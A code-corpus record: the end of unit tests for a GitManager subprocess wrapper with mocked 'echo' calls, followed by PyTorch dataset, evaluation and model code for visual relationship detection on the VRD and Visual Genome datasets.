subprocess_popen.return_value.wait.assert_called_with(timeout=None)
# make another call
run2 = run.ProcessRun("echo")
run2.run()
subprocess_popen.return_value.returncode = 1
subprocess_popen.reset_mock()
self.assertEqual(run2.returncode, 1)
subprocess_popen.assert_not_called()
subprocess_popen.return_value.wait.assert_not_called()
@unittest.mock.patch('subprocess.Popen')
@unittest.mock.patch('os.getcwd', return_value='/')
@unittest.mock.patch('os.environ.copy', return_value={})
def test_success(self, os_environ_copy: unittest.mock.Mock,
os_getcwd_mock: unittest.mock.Mock,
subprocess_popen: unittest.mock.Mock):
""" Tests that the success attribute works properly """
# make a new run and wait for the default amount of time
run1 = run.ProcessRun("echo")
# mock the returncode of the call
subprocess_popen.return_value.returncode = 0
self.assertEqual(run1.success, True)
# we should have called the subprocess
subprocess_popen.assert_called_with(['echo'], cwd='/',
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE, env={})
# and a wait call
subprocess_popen.return_value.wait.assert_called_with(timeout=None)
# make another call
run2 = run.ProcessRun("echo")
run2.run()
subprocess_popen.return_value.returncode = 1
subprocess_popen.reset_mock()
self.assertEqual(run2.success, False)
subprocess_popen.assert_not_called()
subprocess_popen.return_value.wait.assert_not_called()
class TestGitRun(unittest.TestCase):
@unittest.mock.patch('os.getcwd', return_value='/')
@unittest.mock.patch('os.environ.copy', return_value={})
def test_init(self, os_environ_copy: unittest.mock.Mock,
os_getcwd_mock: unittest.mock.Mock):
""" Tests that GitRun instances are created properly """
# almost everything is default
run1 = run.GitRun("Hello world")
os_environ_copy.assert_called_once_with()
os_getcwd_mock.assert_called_once_with()
self.assertEqual(run1.exe, 'git')
self.assertEqual(run1.args, ['Hello world'])
self.assertEqual(run1.cwd, '/')
self.assertEqual(run1.environment, {})
self.assertEqual(run1.pipe_stdout, False)
self.assertEqual(run1.pipe_stderr, False)
self.assertEqual(run1.pipe_stdin, False)
# and reset the mocks please
os_environ_copy.reset_mock()
os_getcwd_mock.reset_mock()
# use some non-default values
run2 = run.GitRun("Hello world", cwd='/hello',
pipe_stdout=True, environment={'hello': 'world'})
os_environ_copy.assert_not_called()
os_getcwd_mock.assert_not_called()
self.assertEqual(run2.exe, 'git')
self.assertEqual(run2.args, ['Hello world'])
self.assertEqual(run2.cwd, '/hello')
self.assertEqual(run2.environment, {'hello': 'world'})
self.assertEqual(run2.pipe_stdout, True)
self.assertEqual(run2.pipe_stderr, False)
self.assertEqual(run2.pipe_stdin, False)
|
[
"/GitManager/__main__.py",
"/GitManager/commands/__init__.py",
"/GitManager/commands/clone.py",
"/GitManager/commands/fetch.py",
"/GitManager/commands/gc.py",
"/GitManager/commands/lister.py",
"/GitManager/commands/pull.py",
"/GitManager/commands/push.py",
"/GitManager/commands/reconfigure.py",
"/GitManager/commands/state.py",
"/GitManager/commands/status.py",
"/GitManager/config/file.py",
"/GitManager/config/line.py",
"/GitManager/config/tree.py",
"/GitManager/main.py",
"/GitManager/repo/description.py",
"/GitManager/repo/finder.py",
"/GitManager/repo/implementation.py",
"/GitManager/utils/format.py",
"/GitManager/utils/run.py",
"/setup.py",
"/tests/commands/test_command.py",
"/tests/commands/test_fetch.py",
"/tests/commands/test_gc.py",
"/tests/commands/test_lister.py",
"/tests/commands/test_reconfigure.py",
"/tests/commands/test_setup.py",
"/tests/commands/test_state.py",
"/tests/commands/test_status.py",
"/tests/config/test_file.py",
"/tests/config/test_line.py",
"/tests/config/test_tree.py",
"/tests/repo/test_description.py",
"/tests/repo/test_finder.py",
"/tests/repo/test_implementation.py",
"/tests/utils/test_format.py",
"/tests/utils/test_run.py"
] |
00mjk/NMP
|
import torch
from torch.utils.data import Dataset
from torch.utils.data import DataLoader
import random
import numpy as np
import os
import pickle
import ipdb
from utils import read_roidb, box_id, get_box_feats
class VrdPredDataset(Dataset):
"""docstring for VrdPred"""
def __init__(self, mode = 'train', feat_mode = 'full', prior = False, ori_vgg=False, use_loc=False):
super(VrdPredDataset, self).__init__()
self.num_nodes = 21
self.num_node_types = 101
self.num_edge_types = 71
self.num_edges = 41 #41 #30 #91
if mode == 'train':
self.mode = 'train'
else:
self.mode = 'test'
self.feat_mode = feat_mode
self.prior = prior
# ----------- senmantic feature ------------- #
self.predicates_vec = np.load('./data/vrd_predicates_vec.npy')
self.objects_vec = np.load('./data/vrd_objects_vec.npy')
# ------------ original roidb feature --------#
self.roidb_read = read_roidb('./data/vrd_pred_graph_roidb.npz')
self.roidb = self.roidb_read[self.mode]
# Exclude self edges
self.off_diag_idx = np.ravel_multi_index(
np.where(np.ones((self.num_nodes, self.num_nodes)) - np.eye(self.num_nodes)),
[self.num_nodes, self.num_nodes])
# ------------ prior probability ------------- #
# shape: [100, 100, 70] sum of the last dimension is 1
f = open('./data/vrd_so_prior.pkl', 'rb')
f.seek(0)
self.rel_so_prior = pickle.load(f, encoding='bytes') #[100, 100, 70]
# ------------- prior of the existance of current [sub, obj] pair ---#
# shape: [100, 100] sum=1
self.prior_probs = np.load('./data/vrd_prior_prob.npy', encoding='bytes')
self.use_loc = use_loc
def get_adj(self, roidb_use):
bbox_coordinates = np.zeros([self.num_edges, 20])
matrix = np.eye(self.num_nodes)
rel_rec = np.zeros([self.num_edges, self.num_nodes])
rel_send = np.zeros([self.num_edges, self.num_nodes])
sub_idx = box_id(roidb_use['sub_box_gt'], roidb_use['uni_box_gt'])
obj_idx = box_id(roidb_use['obj_box_gt'], roidb_use['uni_box_gt'])
for i in range(len(sub_idx)):
sub_id = int(sub_idx[i])
obj_id = int(obj_idx[i])
rel_rec[i] = matrix[obj_id]
rel_send[i] = matrix[sub_id]
bbox_coordinates[i] = get_box_feats(roidb_use['uni_box_gt'][sub_id], roidb_use['uni_box_gt'][obj_id])
# --------- cross entropy loss ---------#
edges = np.zeros(self.num_edges) + self.num_edge_types - 1
edges[:len(roidb_use['rela_gt'])] = roidb_use['rela_gt']
edges = np.array(edges, dtype=np.int64)
node_cls = np.zeros(self.num_nodes) + self.num_node_types - 1
node_cls[:len(roidb_use['uni_gt'])] = roidb_use['uni_gt']
node_cls = np.array(node_cls, dtype=np.int64)
return edges, node_cls, rel_rec, rel_send, bbox_coordinates
def train_item(self, roidb_use):
if self.feat_mode == 'full':
# --------- node feature ------------#
feats = np.load(roidb_use['uni_fc7'])
w2vec = list(map(lambda x: self.objects_vec[int(x)], roidb_use['uni_gt']))
w2vec = np.reshape(np.array(w2vec),[-1, 300])
nodes = np.zeros([self.num_nodes, 4396])
nodes[:feats.shape[0], :4096] = feats
nodes[:feats.shape[0], 4096:] = w2vec # [self.num_nodes, 4096+300]
elif self.feat_mode == 'vis':
feats = np.load(roidb_use['uni_fc7'])
nodes = np.zeros([self.num_nodes, 4096])
nodes[:feats.shape[0]] = feats
elif self.feat_mode == 'sem':
w2vec = list(map(lambda x: self.objects_vec[int(x)], roidb_use['uni_gt']))
w2vec = np.reshape(np.array(w2vec),[-1, 300])
nodes = np.zeros([self.num_nodes, 300])
nodes[:w2vec.shape[0]] = w2vec
prior_matrix = np.zeros([self.num_edges, self.num_edge_types])-0.5/self.num_edge_types
for i in range(len(roidb_use['rela_gt'])):
sub_cls = int(roidb_use['sub_gt'][i])
obj_cls = int(roidb_use['obj_gt'][i])
current_prior = self.rel_so_prior[sub_cls, obj_cls]
# current_prior = -0.5*(current_prior+1.0/self.num_edge_types)
current_prior = -0.5*(1.0/self.num_edge_types)
prior_matrix[i, :(self.num_edge_types-1)] = current_prior
# ------ region vgg feature --- initialize edge feature ---------#
# sub_idx = box_id(roidb_use['sub_box_gt'], roidb_use['uni_box_gt'])
# obj_idx = box_id(roidb_use['obj_box_gt'], roidb_use['uni_box_gt'])
edge_feats = np.zeros([self.num_edges, 512])
pred_fc7 = np.load(roidb_use['pred_fc7'])
edge_feats[:len(roidb_use['rela_gt'])] = pred_fc7
return nodes, edge_feats, prior_matrix
def __getitem__(self, index):
roidb_use = self.roidb[index]
nodes, edge_feats, prior_matrix = self.train_item(roidb_use)
edges, node_cls, rel_rec, rel_send, bbox_coordinates = self.get_adj(roidb_use)
bbox_coordinates = torch.FloatTensor(bbox_coordinates)
nodes = torch.FloatTensor(nodes)
edges = torch.LongTensor(edges)
node_cls = torch.LongTensor(node_cls)
edge_feats = torch.FloatTensor(edge_feats)
rel_rec = torch.FloatTensor(rel_rec)
rel_send = torch.FloatTensor(rel_send)
prior_matrix = torch.FloatTensor(prior_matrix)
if self.prior:
return nodes, edges, node_cls, edge_feats, rel_rec, rel_send, bbox_coordinates, prior_matrix
else:
return nodes, edges, node_cls, edge_feats, rel_rec, rel_send
def __len__(self):
return len(self.roidb)
class VrdRelaDataset(Dataset):
"""docstring for VrdRela"""
def __init__(self, mode = 'train', feat_mode = 'full', prior=False, ori_vgg=False, use_loc=False):
super(VrdRelaDataset, self).__init__()
self.num_nodes = 21 #44 #21
self.num_edges = 41 #30 #170
self.num_node_types = 101
self.num_edge_types = 71
self.feat_mode = feat_mode
self.prior = prior
if mode == 'train':
self.mode = 'train'
else:
self.mode = 'test'
# if mode == 'test':
self.num_nodes = 96 #63
self.num_edges = self.num_nodes * (self.num_nodes-1)
# ----------- senmantic feature ------------- #
self.predicates_vec = np.load('./data/vrd_predicates_vec.npy')
self.objects_vec = np.load('./data/vrd_objects_vec.npy')
# ------------ original roidb feature --------#
self.roidb_read = read_roidb('./data/vrd_rela_graph_roidb_iou_dis_{}_{}.npz'.format(0.5*10, 0.45*10))
self.roidb = self.roidb_read[self.mode]
# Exclude self edges
self.off_diag_idx = np.ravel_multi_index(
np.where(np.ones((self.num_nodes, self.num_nodes)) - np.eye(self.num_nodes)),
[self.num_nodes, self.num_nodes])
# ------------ prior probability ------------- #
self.prior = prior
f = open('./data/vrd_so_prior.pkl', 'rb')
f.seek(0)
self.rel_so_prior = pickle.load(f, encoding='bytes') #[100, 100, 70]
self.use_loc = use_loc
def get_adj(self, roidb_use):
bbox_coordinates = np.zeros([self.num_edges, 20])
matrix = np.eye(self.num_nodes)
rel_rec = np.zeros([self.num_edges, self.num_nodes])
rel_send = np.zeros([self.num_edges, self.num_nodes])
sub_idx = box_id(roidb_use['sub_box_dete'], roidb_use['uni_box_gt'])
obj_idx = box_id(roidb_use['obj_box_dete'], roidb_use['uni_box_gt'])
for i in range(len(sub_idx)):
sub_id = int(sub_idx[i])
obj_id = int(obj_idx[i])
rel_rec[i] = matrix[obj_id]
rel_send[i] = matrix[sub_id]
bbox_coordinates[i] = get_box_feats(roidb_use['uni_box_gt'][sub_id], roidb_use['uni_box_gt'][obj_id])
edges = np.zeros(self.num_edges) + self.num_edge_types-1
edges[:len(roidb_use['rela_dete'])] = roidb_use['rela_dete']
edges = np.array(edges, dtype=np.int64)
node_cls = np.zeros(self.num_nodes) + self.num_node_types-1
node_cls[:len(roidb_use['uni_gt'])] = roidb_use['uni_gt']
node_cls = np.array(node_cls, dtype=np.int64)
return edges, node_cls, rel_rec, rel_send, bbox_coordinates
def train_item(self, roidb_use):
# --------- node feature ------------#
feats = np.load(roidb_use['uni_fc7'])
w2vec = list(map(lambda x: self.objects_vec[int(x)], roidb_use['uni_gt']))
w2vec = np.reshape(np.array(w2vec),[-1, 300])
if feats.shape[0] > self.num_nodes:
index_box = np.sort(random.sample(range(feats.shape[0]), self.num_nodes))
feats = feats[index_box, :]
w2vec = w2vec[index_box, :]
if self.feat_mode == 'full':
nodes = np.concatenate([feats, w2vec], 1) # [self.num_nodes, 4096+300]
elif self.feat_mode == 'vis':
nodes = feats
elif self.feat_mode == 'sem':
nodes = w2vec
# --------- edge feature ------------#
# edge_idx = roidb_use['edge_matrix'][index_box, :]
# edge_idx = edge_idx[:, index_box] # [self.num_nodes, self.num_nodes]
else:
if self.feat_mode == 'full':
nodes = np.zeros([self.num_nodes, 4396])
nodes[:feats.shape[0], :4096] = feats
nodes[:feats.shape[0], 4096:] = w2vec # [self.num_nodes, 4096+300]
elif self.feat_mode == 'vis':
nodes = np.zeros([self.num_nodes, 4096])
nodes[:feats.shape[0]] = feats
elif self.feat_mode == 'sem':
nodes = np.zeros([self.num_nodes, 300])
nodes[:w2vec.shape[0]] = w2vec
prior_matrix = np.zeros([self.num_edges, self.num_edge_types])-0.5/self.num_edge_types
for i in range(len(roidb_use['rela_dete'])):
sub_cls = int(roidb_use['sub_dete'][i])
obj_cls = int(roidb_use['obj_dete'][i])
current_prior = self.rel_so_prior[sub_cls, obj_cls]
# current_prior = -0.5*(current_prior+1.0/self.num_edge_types)
current_prior = -0.5*(1.0/self.num_edge_types)
prior_matrix[i, :(self.num_edge_types-1)] = current_prior
# ------ region vgg feature --- initialize edge feature ---------#
sub_idx = box_id(roidb_use['sub_box_dete'], roidb_use['uni_box_gt'])
obj_idx = box_id(roidb_use['obj_box_dete'], roidb_use['uni_box_gt'])
edge_feats = np.zeros([self.num_edges, 512])
# pred_fc7 = np.load(roidb_use['pred_fc7'])
# edge_feats[:len(roidb_use['rela_dete'])] = pred_fc7
# for i in range(len(sub_idx)):
# edge_feats[int(sub_idx[i]),int(obj_idx[i])] = pred_fc7[i]
# edge_feats = np.reshape(edge_feats, [self.num_nodes ** 2, -1])
# edge_feats = edge_feats[self.off_diag_idx]
return nodes, edge_feats, prior_matrix
def __getitem__(self, index):
roidb_use = self.roidb[index]
nodes, edge_feats, prior_matrix = self.train_item(roidb_use)
edges, node_cls, rel_rec, rel_send, bbox_coordinates = self.get_adj(roidb_use)
bbox_coordinates = torch.FloatTensor(bbox_coordinates)
nodes = torch.FloatTensor(nodes)
edges = torch.LongTensor(edges)
node_cls = torch.LongTensor(node_cls)
edge_feats = torch.FloatTensor(edge_feats)
rel_rec = torch.FloatTensor(rel_rec)
rel_send = torch.FloatTensor(rel_send)
prior_matrix = torch.FloatTensor(prior_matrix)
if self.prior:
return nodes, edges, node_cls, edge_feats, rel_rec, rel_send, bbox_coordinates, prior_matrix
else:
return nodes, edges, node_cls, edge_feats, rel_rec, rel_send
def __len__(self):
return len(self.roidb)
class VgPredDataset(Dataset):
"""docstring for VgPred"""
def __init__(self, mode = 'train', feat_mode = 'full', prior = False, ori_vgg=False, use_loc=False):
super(VgPredDataset, self).__init__()
self.num_nodes = 110 #98
self.num_edge_types = 101
self.num_node_types = 201
self.num_edges = 490 #352
if mode == 'train':
self.mode = 'train'
else:
self.mode = 'test'
self.feat_mode = feat_mode
self.prior = prior
# ----------- senmantic feature ------------- #
self.predicates_vec = np.load('./data/vg_predicates_vec.npy')
self.objects_vec = np.load('./data/vg_objects_vec.npy')
# ------------ original roidb feature --------#
self.roidb_read = read_roidb('./data/vg_pred_graph_roidb.npz')
self.roidb = self.roidb_read[self.mode]
self.rel_so_prior = np.load('./data/vg_so_prior.npy') #[201, 201, 100]
self.use_loc = use_loc
def get_adj(self, roidb_use):
bbox_coordinates = np.zeros([self.num_edges, 20])
matrix = np.eye(self.num_nodes)
rel_rec = np.zeros([self.num_edges, self.num_nodes])
rel_send = np.zeros([self.num_edges, self.num_nodes])
sub_idx = box_id(roidb_use['sub_box_gt'], roidb_use['uni_box_gt'])
obj_idx = box_id(roidb_use['obj_box_gt'], roidb_use['uni_box_gt'])
for i in range(len(sub_idx)):
sub_id = int(sub_idx[i])
obj_id = int(obj_idx[i])
rel_rec[i] = matrix[obj_id]
rel_send[i] = matrix[sub_id]
bbox_coordinates[i] = get_box_feats(roidb_use['uni_box_gt'][sub_id], roidb_use['uni_box_gt'][obj_id])
edges = np.zeros(self.num_edges) + self.num_edge_types - 1
edges[:len(roidb_use['rela_gt'])] = roidb_use['rela_gt']
edges = np.array(edges, dtype=np.int64)
node_cls = np.zeros(self.num_nodes) + self.num_node_types-1
node_cls[:len(roidb_use['uni_gt'])] = roidb_use['uni_gt']
node_cls = np.array(node_cls, dtype=np.int64)
return edges, node_cls, rel_rec, rel_send, bbox_coordinates
def train_item(self, roidb_use):
if self.feat_mode == 'full':
# --------- node feature ------------#
feats = np.load(roidb_use['uni_fc7'])
w2vec = list(map(lambda x: self.objects_vec[int(x)], roidb_use['uni_gt']))
w2vec = np.reshape(np.array(w2vec),[-1, 300])
nodes = np.zeros([self.num_nodes, 4396])
nodes[:feats.shape[0], :4096] = feats
nodes[:feats.shape[0], 4096:] = w2vec # [self.num_nodes, 4096+300]
elif self.feat_mode == 'vis':
feats = np.load(roidb_use['uni_fc7'])
nodes = np.zeros([self.num_nodes, 4096])
nodes[:feats.shape[0]] = feats
elif self.feat_mode == 'sem':
w2vec = list(map(lambda x: self.objects_vec[int(x)], roidb_use['uni_gt']))
w2vec = np.reshape(np.array(w2vec),[-1, 300])
nodes = np.zeros([self.num_nodes, 300])
nodes[:w2vec.shape[0]] = w2vec
# prior_matrix = np.zeros([self.num_edges, self.num_edge_types])
prior_matrix = np.zeros([self.num_edges, self.num_edge_types])-0.5/self.num_edge_types
for i in range(len(roidb_use['rela_gt'])):
sub_cls = int(roidb_use['sub_gt'][i])
obj_cls = int(roidb_use['obj_gt'][i])
current_prior = self.rel_so_prior[sub_cls, obj_cls]
current_prior = -0.5*(current_prior+1.0/self.num_edge_types)
# current_prior = -1.0*(current_prior+1.0/self.num_edge_types)
prior_matrix[i, :(self.num_edge_types-1)] = current_prior
# ------ region vgg feature --- initialize edge feature ---------#
# sub_idx = box_id(roidb_use['sub_box_gt'], roidb_use['uni_box_gt'])
# obj_idx = box_id(roidb_use['obj_box_gt'], roidb_use['uni_box_gt'])
edge_feats = np.zeros([self.num_edges, 512])
pred_fc7 = np.load(roidb_use['pred_fc7'])
edge_feats[:len(roidb_use['rela_gt'])] = pred_fc7
return nodes, edge_feats, prior_matrix
def __getitem__(self, index):
roidb_use = self.roidb[index]
nodes, edge_feats, prior_matrix = self.train_item(roidb_use)
edges, node_cls, rel_rec, rel_send, bbox_coordinates = self.get_adj(roidb_use)
nodes = torch.FloatTensor(nodes)
edges = torch.LongTensor(edges)
node_cls = torch.LongTensor(node_cls)
edge_feats = torch.FloatTensor(edge_feats)
rel_rec = torch.FloatTensor(rel_rec)
rel_send = torch.FloatTensor(rel_send)
prior_matrix = torch.FloatTensor(prior_matrix)
bbox_coordinates = torch.FloatTensor(bbox_coordinates)
if self.prior:
return nodes, edges, node_cls, edge_feats, rel_rec, rel_send, bbox_coordinates, prior_matrix
else:
return nodes, edges, node_cls, edge_feats, rel_rec, rel_send
def __len__(self):
return len(self.roidb)
def load_dataset(data_set='vrd', ori_vgg=False, dataset='pred', level='image', batch_size=32, eval_batch_size=32, shuffle=False, feat_mode='full', prior=False):
if data_set == 'vrd':
if dataset=='pred' and level=='image':
load_func_name = VrdPredDataset
elif dataset=='rela' and level=='image':
load_func_name = VrdRelaDataset
else:
load_func_name = VgPredDataset
train_data = load_func_name(mode='train', feat_mode = feat_mode, prior=True, ori_vgg=ori_vgg)
val_data = load_func_name(mode='test', feat_mode = feat_mode, prior=True, ori_vgg=ori_vgg)
test_data = load_func_name(mode='test', feat_mode = feat_mode, prior=True, ori_vgg=ori_vgg)
train_loader = DataLoader(train_data, shuffle=shuffle, batch_size=batch_size)
val_loader = DataLoader(val_data, shuffle=False, batch_size=eval_batch_size)
test_loader = DataLoader(test_data, shuffle=False, batch_size=eval_batch_size)
return train_loader, val_loader, test_loader
--- FILE SEPARATOR ---
from __future__ import print_function
import numpy as np
import os
import ipdb
import time
from tqdm import tqdm
from utils import read_roidb, compute_iou_each
def graph_npy2roidb(roidb, pred_probs, pred_cls, mode='pred', level='image', topk=False):
'''
function: process the pred_probs and pred_cls to the roidb format;
then the metric calculation functions can deal with them
args:
roidb: the ground truth roidb array of dict
topk: get the top k highest predication
pred_probs: the prediction probs of the predicate based on the input box pair
shape: [N_GT_set, k]
pred_cls: the prediction class of the predicate based on the input box pair
shape: [N_GT_set, k]
mode: 'pred' or 'rela'
'''
def _output2roidb(roidb_use, output, output_score, mode='pred'):
if mode == 'pred':
N_total = len(roidb_use['rela_gt'])
else:
N_total = len(roidb_use['rela_dete'])
pred_rela = output[:N_total]
pred_rela_score = output_score[:N_total]
return pred_rela, pred_rela_score
def _instance_output2roidb(start, roidb_use, output, output_score, mode='pred'):
if mode == 'pred':
N_total = len(roidb_use['rela_gt'])
else:
N_total = len(roidb_use['rela_dete'])
pred_rela = pred_cls[start:(start+N_total)]
pred_rela_score = pred_probs[start:(start+N_total)]
start += N_total
return start, pred_rela, pred_rela_score
pred_roidb = []
N_data = len(roidb)
start = 0
if mode == 'pred':
for i in range(N_data):
roidb_use = roidb[i]
if level == 'instance':
start, pred_rela, pred_rela_score = _instance_output2roidb(start, roidb_use, pred_cls, pred_probs, mode=mode)
else:
pred_rela, pred_rela_score = _output2roidb(roidb_use, pred_cls[i], pred_probs[i], mode=mode)
pred_roidb_temp = {'pred_rela': pred_rela, 'pred_rela_score': pred_rela_score,
'sub_box_dete': roidb_use['sub_box_gt'], 'obj_box_dete': roidb_use['obj_box_gt'],
'sub_dete': roidb_use['sub_gt'], 'obj_dete': roidb_use['obj_gt']}
pred_roidb.append(pred_roidb_temp)
elif mode == 'rela':
# train set
if N_data > 1000:
for i in range(N_data):
roidb_use = roidb[i]
if level == 'instance':
start, pred_rela, pred_rela_score = _instance_output2roidb(start, roidb_use, pred_cls, pred_probs, mode=mode)
else:
pred_rela, pred_rela_score = _output2roidb(roidb_use, pred_cls[i], pred_probs[i], mode=mode)
pred_roidb_temp = {'pred_rela': pred_rela, 'pred_rela_score': pred_rela_score,
'sub_box_dete': roidb_use['sub_box_dete'], 'obj_box_dete': roidb_use['obj_box_dete'],
'sub_dete': roidb_use['sub_dete'], 'obj_dete': roidb_use['obj_dete']}
pred_roidb.append(pred_roidb_temp)
else:
for i in range(N_data):
roidb_use = roidb[i]
if level == 'instance':
start, pred_rela, pred_rela_score = _instance_output2roidb(start, roidb_use, pred_cls, pred_probs, mode=mode)
else:
pred_rela, pred_rela_score = _output2roidb(roidb_use, pred_cls[i], pred_probs[i], mode=mode)
sub_score = roidb_use['sub_score']
obj_score = roidb_use['obj_score']
sub_obj_score = np.log(sub_score) + np.log(obj_score)
# sub_obj_score = np.zeros_like(obj_score)
if topk:
pred_rela_score = list(map(lambda i: sub_obj_score + pred_rela_score[:,i], range(pred_rela_score.shape[-1])))
pred_rela_score = np.array(pred_rela_score).T
else:
pred_rela_score = pred_rela_score + sub_obj_score
pred_roidb_temp = {'pred_rela': pred_rela, 'pred_rela_score': pred_rela_score,
'sub_box_dete': roidb_use['sub_box_dete'], 'obj_box_dete': roidb_use['obj_box_dete'],
# 'sub_dete': roidb_use['sub_dete']-1, 'obj_dete': roidb_use['obj_dete']-1}
'sub_dete': roidb_use['sub_dete'], 'obj_dete': roidb_use['obj_dete']}
pred_roidb.append(pred_roidb_temp)
roidb_temp = {}
roidb_temp['pred_roidb'] = pred_roidb
return roidb_temp
def compute_overlap(det_bboxes, gt_bboxes):
"""
Compute overlap of detected and ground truth boxes.
Inputs:
- det_bboxes: array (2, 4), 2 x [y_min, y_max, x_min, x_max]
The detected bounding boxes for subject and object
- gt_bboxes: array (2, 4), 2 x [y_min, y_max, x_min, x_max]
The ground truth bounding boxes for subject and object
Returns:
- overlap: non-negative float <= 1
"""
overlaps = []
for det_bbox, gt_bbox in zip(det_bboxes, gt_bboxes):
overlaps.append(compute_iou_each(det_bbox, gt_bbox))
return min(overlaps)
def roidb2list(test_roidb, pred_roidb, mode='pred', topk=False, is_zs=False, dataset='vrd'):
N_data = len(test_roidb)
if topk:
if dataset == 'vrd':
k = 70
else:
k = 100
else:
k = 1
# k = 70 if topk else 1
det_labels = []
det_bboxes = []
for i in range(N_data):
if mode == 'pred':
n_dete = len(test_roidb[i]['rela_gt'])
else:
n_dete = len(test_roidb[i]['rela_dete'])
conf_dete = np.ones([n_dete*k, 1])
dete_label = np.concatenate([conf_dete, \
np.reshape(pred_roidb[i]['pred_rela_score'],[n_dete*k,1]),
conf_dete,
np.repeat(np.reshape(pred_roidb[i]['sub_dete'],[n_dete,1]),k,axis=0),
np.reshape(pred_roidb[i]['pred_rela'],[n_dete*k,1]),
np.repeat(np.reshape(pred_roidb[i]['obj_dete'],[n_dete,1]),k,axis=0)], 1)
dete_box = np.repeat(np.concatenate([
np.reshape(pred_roidb[i]['sub_box_dete'],[n_dete, 1, 4]),
np.reshape(pred_roidb[i]['obj_box_dete'],[n_dete, 1, 4])], 1), k, axis=0)
det_labels.append(dete_label)
det_bboxes.append(dete_box)
gt_labels = []
gt_bboxes = []
if is_zs:
if dataset == 'vrd':
zs_flag = np.load('/DATA5_DB8/data/yhu/NRI/dsr_data/dsr_zs.npy', encoding='bytes')
else:
zs_flag = read_roidb('/DATA5_DB8/data/yhu/VTransE/input/zeroshot_vg.npz')
for i in range(N_data):
if is_zs:
if dataset == 'vrd':
zs_index = np.where(zs_flag[i]==1)[0]
else:
zs_index = np.where(zs_flag[i]['zero_shot']==1)[0]
rela_gt = test_roidb[i]['rela_gt'][zs_index]
sub_gt = test_roidb[i]['sub_gt'][zs_index]
obj_gt = test_roidb[i]['obj_gt'][zs_index]
sub_box_gt = test_roidb[i]['sub_box_gt'][zs_index]
obj_box_gt = test_roidb[i]['obj_box_gt'][zs_index]
else:
rela_gt = test_roidb[i]['rela_gt']
sub_gt = test_roidb[i]['sub_gt']
obj_gt = test_roidb[i]['obj_gt']
sub_box_gt = test_roidb[i]['sub_box_gt']
obj_box_gt = test_roidb[i]['obj_box_gt']
n_gt = len(rela_gt)
gt_label = np.concatenate([
np.reshape(sub_gt, [n_gt,1]),
np.reshape(rela_gt, [n_gt,1]),
np.reshape(obj_gt, [n_gt,1])], 1)
gt_box = np.concatenate([
np.reshape(sub_box_gt, [n_gt, 1, 4]),
np.reshape(obj_box_gt, [n_gt, 1, 4])], 1)
gt_labels.append(gt_label)
gt_bboxes.append(gt_box)
return det_labels, det_bboxes, gt_labels, gt_bboxes
def eval_result(test_roidb, pred_roidb, N_recall, is_zs=False, mode='pred', topk=False, dataset='vrd'):
det_labels, det_bboxes, gt_labels, gt_bboxes = \
roidb2list(test_roidb, pred_roidb, mode=mode, topk=topk, is_zs=is_zs, dataset=dataset)
relationships_found = 0
n_re = N_recall
all_relationships = sum(labels.shape[0] for labels in gt_labels)
for item in zip(det_labels, det_bboxes, gt_labels, gt_bboxes):
(det_lbls, det_bxs, gt_lbls, gt_bxs) = item
if not det_lbls.any() or not gt_lbls.any():
continue # omit empty detection matrices
gt_detected = np.zeros(gt_lbls.shape[0])
# det_score = np.sum(np.log(det_lbls[:, 0:3]), axis=1)
det_score = det_lbls[:,1]
inds = np.argsort(det_score)[::-1][:n_re] # at most n_re predictions
for det_box, det_label in zip(det_bxs[inds, :], det_lbls[inds, 3:]):
overlaps = np.array([
max(compute_overlap(det_box, gt_box), 0.499)
if detected == 0 and not any(det_label - gt_label)
else 0
for gt_box, gt_label, detected
in zip(gt_bxs, gt_lbls, gt_detected)
])
if (overlaps >= 0.5).any():
gt_detected[np.argmax(overlaps)] = 1
relationships_found += 1
return float(relationships_found / all_relationships)
--- FILE SEPARATOR ---
import torch
import torch.nn as nn
import torch.nn.functional as F
import math
import ipdb
import torch.utils.model_zoo as model_zoo
from torch.autograd import Variable
class FC(nn.Module):
def __init__(self, in_features, out_features, relu=True):
super(FC, self).__init__()
self.fc = nn.Linear(in_features, out_features)
self.relu = nn.ReLU(inplace=True) if relu else None
def forward(self, x):
x = self.fc(x)
if self.relu is not None:
x = self.relu(x)
return x
class MLP(nn.Module):
"""Two-layer fully-connected ELU net with batch norm."""
def __init__(self, n_in, n_hid, n_out, do_prob=0.):
super(MLP, self).__init__()
self.fc1 = nn.Linear(n_in, n_hid)
self.fc2 = nn.Linear(n_hid, n_out)
self.bn = nn.BatchNorm1d(n_out)
self.dropout_prob = do_prob
self.init_weights()
def init_weights(self):
for m in self.modules():
if isinstance(m, nn.Linear):
nn.init.xavier_normal_(m.weight.data)
m.bias.data.fill_(0.1)
elif isinstance(m, nn.BatchNorm1d):
m.weight.data.fill_(1)
m.bias.data.zero_()
def batch_norm(self, inputs):
x = inputs.view(inputs.size(0) * inputs.size(1), -1)
x = self.bn(x)
return x.view(inputs.size(0), inputs.size(1), -1)
def forward(self, inputs):
# Input shape: [num_sims, num_things, num_features]
x = F.elu(self.fc1(inputs))
x = F.dropout(x, self.dropout_prob, training=self.training)
x = F.elu(self.fc2(x))
return self.batch_norm(x)
class SimpleEncoder(nn.Module):
def __init__(self, n_hid, edge_types=71, node_types=101, do_prob=0., use_vis=True, use_spatial=True, use_sem=True, use_loc=False, use_cls=False):
super(SimpleEncoder, self).__init__()
self.use_vis = use_vis
self.use_spatial = use_spatial
self.use_sem = use_sem
self.use_loc = use_loc
self.use_cls = use_cls
# self.vis_hid = int(n_hid/2)
self.vis_hid = n_hid
self.sem_hid = n_hid
self.spatial_hid = n_hid
self.loc_hid = 64
self.cls_hid = 64
self.fc_vis = FC(4096, self.vis_hid)
self.fc_spatial = FC(512, self.spatial_hid)
self.fc_sem = FC(300, self.sem_hid)
self.fc_loc = FC(20, self.loc_hid)
n_fusion = 0
if self.use_vis:
n_fusion += self.vis_hid
if self.use_cls:
n_fusion += self.cls_hid
if self.use_spatial:
n_fusion += self.spatial_hid
if self.use_sem:
n_fusion += self.sem_hid
if self.use_loc:
n_fusion += self.loc_hid
# ---- sub obj concat ---------#
self.fc_so_vis = FC(self.vis_hid*2, self.vis_hid)
# ---- sub obj concat ---------#
self.fc_so_sem = FC(self.sem_hid*2, self.sem_hid)
# ---- all the feature into hidden space -------#
self.fc_fusion = FC(n_fusion, n_hid)
self.fc_rel = FC(n_hid, edge_types, relu=False)
if self.use_vis:
self.fc_cls = FC(4096, node_types, relu=False)
else:
self.fc_cls = FC(300, node_types, relu=False)
self.fc_so_cls = FC(node_types*2, self.cls_hid)
self.init_weights()
